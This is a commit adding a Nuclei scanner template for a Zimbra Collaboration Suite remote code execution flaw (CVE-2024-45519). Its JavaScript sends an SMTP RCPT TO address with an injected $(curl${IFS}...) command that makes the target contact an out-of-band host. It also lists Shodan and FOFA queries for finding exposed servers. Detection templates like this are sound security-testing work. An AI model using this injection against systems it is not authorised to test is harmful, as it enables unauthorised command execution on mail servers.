Create CVE-2024-45519.yaml

2024-09-28 07:42:21 +05:30 · 2024-09-28 07:42:21 +05:30 · d22c7d3315
parent b786cb2226
commit d22c7d3315
1 changed files with 63 additions and 0 deletions
--- a/javascript/cves/2024/CVE-2024-45519.yaml
+++ b/javascript/cves/2024/CVE-2024-45519.yaml
@ -0,0 +1,63 @@
+id: CVE-2024-45519
+
+info:
+  name: Zimbra Collaboration Suite < 9.0.0 - Remote Code Execution
+  author: pdresearch,iamnoooob,parthmalhotra,ice3man543
+  severity: critical
+  description: |
+    SMTP-based vulnerability in the PostJournal service of Zimbra Collaboration Suite that allows unauthenticated attackers to inject arbitrary commands. This vulnerability arises due to improper sanitization of SMTP input, enabling attackers to craft malicious SMTP messages that execute commands under the Zimbra user context. Successful exploitation can lead to unauthorized access, privilege escalation, and potential compromise of the affected system's integrity and confidentiality.
+  reference:
+    - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
+    - https://blog.projectdiscovery.io/zimbra-remote-code-execution/
+  classification:
+    cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*
+  metadata:
+    vendor: synacor
+    product: zimbra_collaboration_suite
+    shodan-query:
+      - http.title:"zimbra collaboration suite"
+      - http.title:"zimbra web client sign in"
+      - http.favicon.hash:1624375939
+    fofa-query:
+      - title="zimbra web client sign in"
+      - title="zimbra collaboration suite"
+  tags: cve,cve2024,rce,zimbra
+
+javascript:
+  - pre-condition: |
+      isPortOpen(Host,Port);
+    code: |
+      let m = require('nuclei/net');
+      let address = Host+":"+Port;
+      let conn;
+      conn=  m.Open('tcp', address)
+      conn.Send('EHLO localhost\r\n');
+      conn.RecvString()
+      conn.Send('MAIL FROM: <aaaa@mail.domain.com>\r\n');
+      conn.RecvString()
+      conn.Send('RCPT TO: <"aabbb$(curl${IFS}'+oast+')"@mail.domain.com>\r\n');
+      conn.RecvString()
+      conn.Send('DATA\r\n');
+      conn.RecvString()
+      conn.Send('aaa\r\n');
+      conn.RecvString()
+      conn.Send('.\r\n');
+      resp = conn.RecvString()
+      conn.Send('QUIT\r\n');
+      conn.Close()
+      resp
+    args:
+      Host: "{{Host}}"
+      Port: 25
+      oast: "{{interactsh-url}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: word
+        words:
+          - "message delivered"